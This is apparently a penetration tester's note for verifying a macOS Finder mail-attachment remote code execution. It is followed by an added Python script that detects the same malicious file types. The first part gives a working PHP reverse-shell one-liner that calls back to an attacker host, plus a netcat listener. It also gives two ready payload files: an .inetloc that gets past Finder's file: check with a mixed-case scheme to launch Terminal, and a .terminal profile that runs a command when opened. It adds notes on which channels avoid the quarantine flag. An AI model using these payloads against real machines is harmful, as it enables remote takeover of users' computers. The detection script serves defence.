macOS Finder mail-attachment RCE verification
mac reverse shell & listener
macOS ships with php and python (on older releases; php was dropped from the default install starting with macOS Monterey, so check what the target actually has before relying on the php one-liner)
php -r '$sock=fsockopen("10.10.0.4",7777);exec("/bin/sh -i <&3 >&3 2>&3");'   # run on the target; 10.10.0.4 is the attacker host
nc -l 7777   # start this listener on 10.10.0.4 first
payload 1 (.inetloc with a mixed-case FiLe: scheme)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Utilities/Terminal.app</string>
</dict>
</plist>
Save as word.inetloc
Double-clicking the attachment opens Terminal.app without any warning; the mixed-case FiLe: scheme is what gets past Finder's check for file: URLs (details in the SSD advisory referenced below)
payload 2 (.terminal settings file that carries a CommandString, technique from the OBTS v3 talk)
https://objectivebythesea.com/v3/talks/OBTS_v3_vMetnew.pdf
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>echo "Hello"</string>
<key>ProfileCurrentVersion</key>
<string>2.06000000001</string>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>poc</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
Save as 1.terminal; opening it in Terminal runs the CommandString
Files downloaded from the terminal (e.g. with curl) are not tagged with the quarantine attribute
Files received through TG, QQ, WeChat, Mail and similar are all tagged with the quarantine attribute, and opening them triggers a security prompt
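Added example (not part of the original note or of either referenced advisory): a small Python triage script for the two file types above. It parses .inetloc and .terminal plists with the standard-library plistlib, flags an .inetloc whose URL scheme is a case variant of file: (the bypass used in payload 1) and a .terminal file that carries a CommandString (payload 2), and wraps the xattr command to report whether a file on disk carries com.apple.quarantine (the check behind the two lines above; xattr only exists on macOS, so the helper returns False elsewhere). The three sample documents are constructed inline from the payloads on this page plus one benign web link; the file names and function names are my own.

```python
import plistlib
import subprocess

# Constructed samples: payload 1 and payload 2 from this note, plus a benign
# .inetloc pointing at a web URL so the checker has a negative case.
INETLOC_BYPASS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Utilities/Terminal.app</string>
</dict>
</plist>
"""

INETLOC_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>URL</key>
<string>https://example.com/</string>
</dict>
</plist>
"""

TERMINAL_POC = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>CommandString</key>
<string>echo "Hello"</string>
<key>ProfileCurrentVersion</key>
<string>2.06000000001</string>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>poc</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
"""


def inspect_inetloc(data: bytes) -> dict:
    """Parse an .inetloc plist and flag local file: targets, including case variants."""
    doc = plistlib.loads(data)
    url = doc.get("URL", "")
    # Split on the raw scheme; urlsplit would lowercase it and hide the bypass.
    scheme, _, rest = url.partition(":")
    finding = {"kind": "inetloc", "url": url, "scheme": scheme,
               "local_target": None, "case_bypass": False, "suspicious": False}
    if scheme.lower() == "file":
        # Collapse the run of leading slashes to the real absolute path.
        finding["local_target"] = "/" + rest.lstrip("/")
        finding["case_bypass"] = scheme != "file"   # exact "file:" is blocked; "FiLe:" is not
        finding["suspicious"] = True
    return finding


def inspect_terminal(data: bytes) -> dict:
    """Parse a .terminal settings plist and report any embedded command."""
    doc = plistlib.loads(data)
    cmd = doc.get("CommandString")
    return {"kind": "terminal", "command": cmd,
            "run_as_shell": bool(doc.get("RunCommandAsShell", False)),
            "suspicious": cmd is not None}


def inspect_document(name: str, data: bytes):
    """Dispatch on extension; returns None for file types this script does not cover."""
    lower = name.lower()
    if lower.endswith(".inetloc"):
        return inspect_inetloc(data)
    if lower.endswith(".terminal"):
        return inspect_terminal(data)
    return None


def is_quarantined(path: str) -> bool:
    """True if `xattr -p com.apple.quarantine` succeeds on the path (macOS only)."""
    try:
        res = subprocess.run(["xattr", "-p", "com.apple.quarantine", path],
                             capture_output=True, text=True)
    except OSError:          # xattr binary absent (not macOS) -> treat as not quarantined
        return False
    return res.returncode == 0 and res.stdout.strip() != ""


if __name__ == "__main__":
    for name, data in (("word.inetloc", INETLOC_BYPASS),
                       ("link.inetloc", INETLOC_BENIGN),
                       ("1.terminal", TERMINAL_POC)):
        print(name, inspect_document(name, data))
```

Run it as-is to see the three verdicts; on a real mailbox export, feed `inspect_document` the attachment name and bytes and pair it with `is_quarantined` on the saved path to confirm which delivery channels actually tag the file.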
Reference: https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/